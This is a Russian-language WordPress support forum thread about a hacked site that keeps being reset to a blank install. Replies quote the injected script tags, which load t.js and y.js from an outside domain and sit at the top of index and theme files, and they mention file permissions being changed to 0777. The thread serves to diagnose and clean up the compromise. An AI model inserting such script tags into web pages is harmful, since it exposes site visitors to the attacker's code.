Поддержка Проблемы и решения Сайт взломали?

  • Здравствуйте. У меня есть сайт, хостится на таймвебе. Сегодня приходит сообщение на почту «Ваш новый сайт на вордпресс успешно создан». Перехожу на сайт — а там пустой стартовый шаблон. В итоге решил, что сайт взломали, сменил пароль (почту не поменяли), зашёл на хостинг и восстановил старую версию данных.
    В итоге всё заработало.
    Сейчас снова приходит такое же сообщение и опять пароль сброшен и вместо сайта стартовый шаблон. Что это может быть и как пофиксить?
    Спасибо за ответы.

    Страница, с которой нужна помощь: [войдите, чтобы увидеть ссылку]

Просмотр 12 ответов — с 1 по 12 (всего 12)
  • anonymized-14765447

    (@anonymized-14765447)

    kuzalex, привет.

    хостится на таймвебе

    Аминь.

    Что это может быть и как пофиксить?

    Смотрите логи доступа и логи ошибок для начала.

    UPD.: https://room.verybeatifulantony.com/t.js — полагаю, не знаете откуда это, да? Запрашивается 6 раз, расположен перед <!DOCTYPE html>:
    <script type=text/javascript src='https://room.verybeatifulantony.com/t.js'></script><!DOCTYPE html>

    Восстановил снова БД, но в консоль зайти не могу, просто белый экран висит.
    Что за скрипт, не знаю, первый раз его вижу.

    anonymized-14765447

    (@anonymized-14765447)

    kuzalex, сайт взломан, далее уже вам надо как можно скорее выяснять подробности. Посмотрите файлы темы, они модифицированы с вероятностью в 99%.

    З.Ы.: восстанавливать вы можете до упора, но это не решит проблему, если что. Как минимум, вы можете временно закрыть сайт ото всех, кроме себя, и уже в более спокойном режиме начать разбираться с проблемой.

    Спасибо за помощь!

    anonymized-14765447

    (@anonymized-14765447)

    kuzalex, без проблем 🙂 Будут вопросы по данной проблеме — обращайтесь.

    Здравствуйте!

    Такая же проблема! Как восстановить сайт к нормальному состоянию? Хостинг так же ТаймВеб.

    Модератор Yui

    (@fierevere)

    永子

    @valeriy89
    правила форума п2
    даже если проблемы похожи, все сайты разные и их владельцы тоже
    создайте свою тему с вопросом

    Модератор Yuri

    (@yube)

    Хостинг так же ТаймВеб.

    Нехорошее совпадение.

    Аналогичная ситуация на nic.ru Пока решил перезапуском (восстановлением базы). Дпльше конечно нужно смотреть. в MyPHP следов не нашел. Просто поверх переписана новая БД.

    anonymized-14765447

    (@anonymized-14765447)

    Юрий,

    Нехорошее совпадение.

    Довольно обычное для TW 🙂

    plastelin, если нужна помощь в данном вопросе — создайте свою тему и укажите сразу версию WordPress, список плагинов (в т.ч. неактивных), название темы + смотрели ли логи ошибок и логи доступа. Так будет чуть проще определиться в какую сторону «копать».

    hello everyone, I recommend you check for a script «<script type = ‘text / javascript’ src = ‘https: //tom.verybeatifulantony.com/y.js’> </script>» It must be inserted in the first lines of the index. * files (php, html, htm). It must be removed.

    You will need to remove all of these files, otherwise, it will continue to be inserted into these files each time you access as a user with administrative rights.

    You will also see that the «rights» of the file permissions have been changed to RWX (read, write, execute) for all groups (Owner, Group and Others) — normally «0644» is changed to «0777».

    ———
    Привет всем, я рекомендую вам проверить наличие скрипта «<script type = ‘text / javascript’ src = ‘https: //tom.verybeatifulantony.com/y.js’> </ script>» Он должен быть вставлен в первый строки индекса. * файлы (php, html, htm). Это должно быть удалено.

    Вам нужно будет удалить все эти файлы, в противном случае они будут продолжать вставляться в эти файлы каждый раз, когда вы получаете доступ как пользователь с правами администратора.

    Вы также увидите, что «права» прав доступа к файлам были изменены на RWX (чтение, запись, выполнение) для всех групп (Владелец, Группа и другие) — обычно «0644» изменяется на «0777».

    Я надеюсь, что это помогает.
    Поскольку многие файлы могли быть затронуты, лучшим способом было бы восстановить предыдущую резервную копию.
    Для меня первая проверка проблемы была 17 февраля.

    anonymized-14765447

    (@anonymized-14765447)

    Если что, поддомен и название файла могут отличаться + сам скрипт вызывается от 1 до 5 раз и в разных файлах тем.

Просмотр 12 ответов — с 1 по 12 (всего 12)
  • Тема «Сайт взломали?» закрыта для новых ответов.